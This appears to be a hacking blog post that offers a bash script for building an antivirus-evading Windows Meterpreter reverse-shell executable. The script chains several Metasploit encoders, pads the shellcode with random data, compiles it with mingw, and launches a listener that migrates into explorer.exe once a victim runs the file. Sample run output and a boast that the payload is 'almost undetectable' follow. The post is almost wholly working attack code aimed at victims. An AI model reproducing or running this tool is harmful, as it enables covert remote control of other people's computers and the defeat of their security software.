exploit a system outside a network :)

Code :

#!/bin/bash
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                                                            "
echo "  With some Randomic gravy and sauce to bypass Antivirus    "
echo "             http://anonymous1769.blogspot.in/              "
echo "************************************************************"

Code :

rm -rf ShellCode

echo -e "1) LanIP \n2) WanIP?"
read netchoice
case $netchoice in
1)      echo "Here is a network device list available on yor machine"
        cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
        echo -e "What network interface are we gonna use ?  \c"
        read interface
        IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
2)      echo -e "======Getting your WAN IP========="
        IP=`wget -q -O - http://checkip.dyndns.org | cut -d ':' -f2 | cut -d '<' -f1 | cut -d ' ' -f2`;;
esac
echo $IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c $enumber -t raw | msfencode -e x86/jmp_call_additive -c $enumber -t raw | msfencode -e x86/call4_dword_xor -c $enumber -t raw | msfencode -e x86/shikata_ga_nai -c $enumber  > test.c
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include " >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2
echo  ';' >> temp2
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4

/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript='migrate.rb -n explorer.exe' E

Save the file as fud.sh
And set the permission to Execute :
Code :

root@t3amas5assin:~/Desktop# chmod +x fud.sh
root@t3amas5assin:~/Desktop# ./fud.sh
************************************************************
    Automatic  shellcode generator - FOR METASPLOIT         
                                                            
  With some Randomic gravy and sauce to bypass Antivirus    
             http://anonymous1769.blogspot.in/              
************************************************************
1) LanIP 2) WanIP? 2 ======Getting your WAN IP========= 114.79.135.104 What Port Number are we gonna listen to? : 5676 Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 1000 And lastly how many times do we want to encode our payloads 1-20? : 5 [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5) [*] x86/jmp_call_additive succeeded with size 457 (iteration=1) [*] x86/jmp_call_additive succeeded with size 489 (iteration=2) [*] x86/jmp_call_additive succeeded with size 521 (iteration=3) [*] x86/jmp_call_additive succeeded with size 553 (iteration=4) [*] x86/jmp_call_additive succeeded with size 585 (iteration=5) [*] x86/call4_dword_xor succeeded with size 614 (iteration=1) [*] x86/call4_dword_xor succeeded with size 642 (iteration=2) [*] x86/call4_dword_xor succeeded with size 670 (iteration=3) [*] x86/call4_dword_xor succeeded with size 698 (iteration=4) [*] x86/call4_dword_xor succeeded with size 726 (iteration=5) [*] x86/shikata_ga_nai succeeded with size 753 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 780 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 807 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 834 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 861 (iteration=5) 31963.exe ...generated in ShellCode subfolder 31963.exe sha1checksum is..675ee8fa2daf8533fe2c2ebe941de78948fa776a 31963.exe starting the meterpreter listener...

As soon as the the payload is executed on the Victims machine
it will automatically migrate to explorer.exe Process

dj mak

The payload is almost undetectable from most of the virus Engines!!!!

Post a Comment

 
Top
Google+